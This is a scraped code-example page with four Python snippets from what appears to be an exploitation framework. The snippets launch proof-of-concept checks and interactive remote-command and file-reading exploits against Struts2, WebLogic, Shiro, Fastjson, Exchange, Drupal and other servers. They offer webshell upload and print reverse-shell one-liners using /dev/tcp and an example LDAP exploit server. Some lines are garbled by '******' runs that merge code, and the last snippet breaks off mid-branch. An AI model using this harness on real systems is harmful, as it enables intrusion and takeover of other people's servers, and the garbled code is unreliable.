Exemplo n.º 1
0
 def fastjson(self, target, gevent_pool):
     poc_apache_solr = Fastjson(target)
     gevent_pool.append(spawn(poc_apache_solr.fastjson_1224_1_poc))
     gevent_pool.append(spawn(poc_apache_solr.fastjson_1224_2_poc))
     gevent_pool.append(spawn(poc_apache_solr.fastjson_1224_3_poc))
     gevent_pool.append(spawn(poc_apache_solr.fastjson_1247_poc))
     gevent_pool.append(spawn(poc_apache_solr.fastjson_1262_poc))
Exemplo n.º 2
0
    def pt(self, target):
        poc_apache_activemq = ApacheActiveMQ(target)
        poc_apache_activemq.cve_2015_5254_poc()
        poc_apache_activemq.cve_2016_3088_poc()
        poc_apache_activemq = ApacheActiveMQ(target)
        poc_apache_activemq.cve_2015_5254_poc()
        poc_apache_activemq.cve_2016_3088_poc()

        poc_apache_flink = ApacheFlink(target)
        poc_apache_flink.cve_2020_17518_poc()
        poc_apache_flink.cve_2020_17519_poc()

        poc_apache_shiro = ApacheShiro(target)
        poc_apache_shiro.cve_2016_4437_poc()

        poc_apache_solr = ApacheSolr(target)
        poc_apache_solr.cve_2017_12629_poc()
        poc_apache_solr.cve_2019_0193_poc()
        poc_apache_solr.cve_2019_17558_poc()

        poc_apache_tomcat = ApacheTomcat(target)
        poc_apache_tomcat.tomcat_examples_poc()
        poc_apache_tomcat.cve_2017_12615_poc()
        poc_apache_tomcat.cve_2020_1938_poc()

        poc_apache_solr = Fastjson(target)
        poc_apache_solr.fastjson_1224_poc()
        poc_apache_solr.fastjson_1247_poc()
        poc_apache_solr.fastjson_1262_poc()

        poc_spring = Spring(target)
        poc_spring.cve_2020_5410_poc()
        poc_spring.cve_2019_3799_poc()
        poc_spring.cve_2018_1273_poc()

        poc_elasticsearch = Elasticsearch(target)
        poc_elasticsearch.cve_2015_1427_poc()
        poc_elasticsearch.cve_2014_3120_poc()
        poc_jenkins = Jenkins(target)
        poc_jenkins.cve_2017_1000353_poc()
        poc_jenkins.cve_2018_1000861_poc()
        poc_oracle_weblogic = OracleWeblogic(target)
        poc_oracle_weblogic.cve_2014_4210_poc()
        poc_oracle_weblogic.cve_2020_14882_poc()
        poc_oracle_weblogic.cve_2017_3506_poc()
        poc_oracle_weblogic.cve_2017_10271_poc()
        poc_oracle_weblogic.cve_2018_2894_poc()
        poc_oracle_weblogic.cve_2019_2725_poc()
        poc_oracle_weblogic.cve_2020_2555_poc()
        poc_oracle_weblogic.cve_2019_2729_poc()
        poc_oracle_weblogic.cve_2020_2883_poc()
        poc_oracle_weblogic.cve_2020_2551_poc()

        poc_nexus = Nexus(target)
        poc_nexus.cve_2019_7238_poc()
        poc_nexus.cve_2020_10199_poc()

        poc_redhat_jboss = RedHatJBoss(target)
        poc_redhat_jboss.cve_2010_0738_poc()
        poc_redhat_jboss.cve_2010_1428_poc()
        poc_redhat_jboss.cve_2015_7501_poc()
        poc_redhat_jboss.cve_2017_12149_poc()

        poc_apache_unomi = ApacheUnomi(target)
        poc_apache_unomi.cve_2020_13942_poc()

        poc_thinkphp = ThinkPHP(target)
        poc_thinkphp.cve_2019_9082_poc()
        poc_thinkphp.cve_2018_20062_poc()

        poc_drupal = Drupal(target)
        poc_drupal.cve_2018_7600_poc()
        poc_drupal.cve_2018_7602_poc()
        poc_drupal.cve_2019_6340_poc()

        poc_apache_struts2 = ApacheStruts2(target)
        poc_apache_struts2.s2_005_poc()
        poc_apache_struts2.s2_008_poc()
        poc_apache_struts2.s2_009_poc()
        poc_apache_struts2.s2_013_poc()
        poc_apache_struts2.s2_015_poc()
        poc_apache_struts2.s2_016_poc()
        poc_apache_struts2.s2_029_poc()
        poc_apache_struts2.s2_032_poc()
        poc_apache_struts2.s2_045_poc()
        poc_apache_struts2.s2_046_poc()
        poc_apache_struts2.s2_048_poc()
        poc_apache_struts2.s2_052_poc()
        poc_apache_struts2.s2_057_poc()
        poc_apache_struts2.s2_059_poc()
        poc_apache_struts2.s2_061_poc()
        poc_apache_struts2.s2_devMode_poc()

        poc_apache_druid = ApacheDruid(target)
        poc_apache_druid.cve_2021_25646_poc()

        poc_laravel = Laravel(target)
        poc_laravel.cve_2021_3129_poc()

        poc_vmware = Vmware(target)
        poc_vmware.time_2020_1013_poc()
        poc_vmware.cve_2021_21972_poc()

        poc_saltstack = SaltStack(target)
        poc_saltstack.cve_2021_25282_poc()

        poc_nodejs = NodeJs(target)
        poc_nodejs.cve_2021_21315_poc()

        poc_exchange = Exchange(target)
        poc_exchange.cve_2021_26855_poc()
        poc_exchange.cve_2021_27065_poc()
Exemplo n.º 3
0
def exploit(target, vul_num):
    target = url_check(target)
    if survival_check(target) == "f":
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Survival check failed: " + target))
        exit(0)
    delay = globals.get_value("DELAY")  # 获取全局变量DELAY
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    exp_apache_druid = ApacheDruid(target)
    exp_laravel = Laravel(target)
    exp_vmware = Vmware(target)
    exp_saltstack = SaltStack(target)
    exp_exchange = Exchange(target)
    exp_big_ip = BIG_IP(target)
    exp_apache_ofbiz = ApacheOFBiz(target)
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Target url: " + target))
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Use exploit modules: " + vul_num))
    nc = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
        " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\""
    )
    cmd = "whoami"  # 为了消除pycharm错误提示,没啥用
    file = "/etc/passwd"  # 为了消除pycharm错误提示,没啥用
    path = "/tmp/test"  # 为了消除pycharm错误提示,没啥用
    shiro_key = "1"  # 为了消除pycharm错误提示,没啥用
    shiro_gadget = "1"  # 为了消除pycharm错误提示,没啥用
    nexus_u = "admin"  # 为了消除pycharm错误提示,没啥用
    nexus_p = "admin"  # 为了消除pycharm错误提示,没啥用
    laravel_key = "null"  # 为了消除pycharm错误提示,没啥用
    laravel_gadget = 1  # 为了消除pycharm错误提示,没啥用

    if vul_num not in explists:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " The vulnerability does not support exploitation. Please refer to \"--list\""
            ))
        sys.exit(0)

    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(
                now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(
                now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
            nexus_u = input(
                now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
    elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133":
        if os_check() == "linux" or os_check() == "other":
            laravel_key = input(
                now.timed(de=delay) + color.green("[+] Input APP_KEY: "))
        elif os_check() == "windows":
            laravel_key = input(
                now.no_color_timed(de=delay) + "[+] Input APP_KEY: ")
        if os_check() == "linux" or os_check() == "other":
            laravel_gadget = input(
                now.timed(de=delay) + color.green(
                    "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): "))
        elif os_check() == "windows":
            laravel_gadget = input(
                now.no_color_timed(de=delay) +
                "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget)
    elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972":
        if os_check() == "linux" or os_check() == "other":
            os_type = input(
                now.timed(de=delay) +
                color.green("[+] The target os type (linux/windows): "))
        elif os_check() == "windows":
            os_type = input(
                now.no_color_timed(de=delay) +
                "[+] The target os type (linux/windows): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_vmware.cve_2021_21972_exp(cmd, os_type)
    elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282":
        if os_check() == "linux" or os_check() == "other":
            file = input(
                now.timed(de=delay) + color.green("[+] upload file: "))
            path = input(
                now.timed(de=delay) +
                color.green("[+] upload path (e.g. /tmp/test.txt): "))
        elif os_check() == "windows":
            file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
            path = input(
                now.timed(de=delay) +
                color.green("[+] upload path (e.g. /tmp/test.txt): "))
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_saltstack.cve_2021_25282_exp(cmd, file, path)
    elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065":
        if os_check() == "linux" or os_check() == "other":
            email = input(now.timed(de=delay) + color.green("[+] email: "))
            file = input(
                now.timed(de=delay) +
                color.green("[+] webshell name (e.g. shell.aspx): "))
        elif os_check() == "windows":
            email = input(now.timed(de=delay) + color.green("[+] email: "))
            file = input(
                now.no_color_timed(de=delay) +
                "[+] uwebshell name (e.g. shell.aspx: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_exchange.cve_2021_27065_exp(cmd, file, email)

    # 远程命令执行漏洞单独简单运行
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            elif vul_num == "1.2.24":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_exp(cmd)
            elif vul_num == "1.2.47":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "1.2.62":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)

            elif vul_num == "CVE-2021-25646":
                print(bash_2)
                exp_apache_druid.cve_2021_25646_exp(cmd)

            elif vul_num == "CVE-2021-22986":
                exp_big_ip.cve_2021_22986_exp(cmd)
            elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
                print(
                    now.timed(de=delay) + color.yel_info() +
                    color.yellow(" Examples: /etc/passwd"))
                exp_big_ip.cve_2020_5902_exp(cmd)
            elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
                print(
                    now.timed(de=delay) + color.yel_info() + color.yellow(
                        " java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"
                    ))
                exp_apache_ofbiz.cve_2021_26295_exp(cmd)
            else:
                pass
Exemplo n.º 4
0
def exploit(target, vul_num):
    target = url_check(target)
    if survival_check(target) == "f":
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Survival check failed: " + target))
        exit(0)
    delay = globals.get_value("DELAY")  # 获取全局变量DELAY
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Target url: " + target))
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Use exploit modules: " + vul_num))
    nc = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
        " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    cmd = "whoami"  # 为了消除pycharm错误提示,没啥用
    file = "/etc/passwd"  # 为了消除pycharm错误提示,没啥用
    shiro_key = "1"  # 为了消除pycharm错误提示,没啥用
    shiro_gadget = "1"  # 为了消除pycharm错误提示,没啥用
    nexus_u = "admin"  # 为了消除pycharm错误提示,没啥用
    nexus_p = "admin"  # 为了消除pycharm错误提示

    if vul_num not in explists:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " The vulnerability does not support exploitation. Please refer to \"--list\""
            ))
        sys.exit(0)

    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(
                now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(
                now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
            nexus_u = input(
                now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)

    # 远程命令执行漏洞单独简单运行
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
